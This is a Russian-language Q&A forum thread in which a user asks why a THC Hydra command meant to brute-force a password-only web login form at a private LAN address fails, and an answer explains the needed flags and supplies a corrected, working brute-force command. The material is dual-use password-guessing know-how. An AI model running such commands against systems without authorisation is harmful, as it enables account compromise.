hydra http://192.168.0.24:1234/ http-form-post "/password=^PASS^:Invalid password!" -P pass.txt -t 10 -o hydra-http-post-attack.txt
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 12:12:37
[INFO] Using HTTP Proxy: http://127.0.0.1:8080
[ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: Invalid password!

Я не уверен, почему я получаю ошибку, поскольку есть строка ^PASS^ . В приложении нет имени пользователя.

Полный URL-адрес формы для входа: http://192.168.0.24:1234/

Кто-нибудь может помочь?

1 ответ1

1

О вашем вопросе:

  1. При использовании гидры не обязательно указывать http:// перед хостом, на который вы собираетесь атаковать.
  2. Чтобы указать порт, пожалуйста, используйте флаг -s .
  3. Вам нужно указать флаг -l иначе появится ошибка.
  4. В запросе POST вы должны указать файл, который будет получать запрос POST (например, index.php, password.php, validate.php и т.д.)
  5. И последнее, но не менее важное: вы должны указать «Успешный» или «Неудачный».

Попробуйте следующую команду, это лучшее, что я могу сделать с предоставленной информацией:

hydra -l '' -P pass.txt 192.168.0.24 -s 1234 http-post-form "/index.php:pass=^PASS^:F=Invalid Password!" -t 10 -o hydra-http-post-attack.txt

Я попробовал это сам, и это не генерирует никакой ошибки.

Удачи!

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .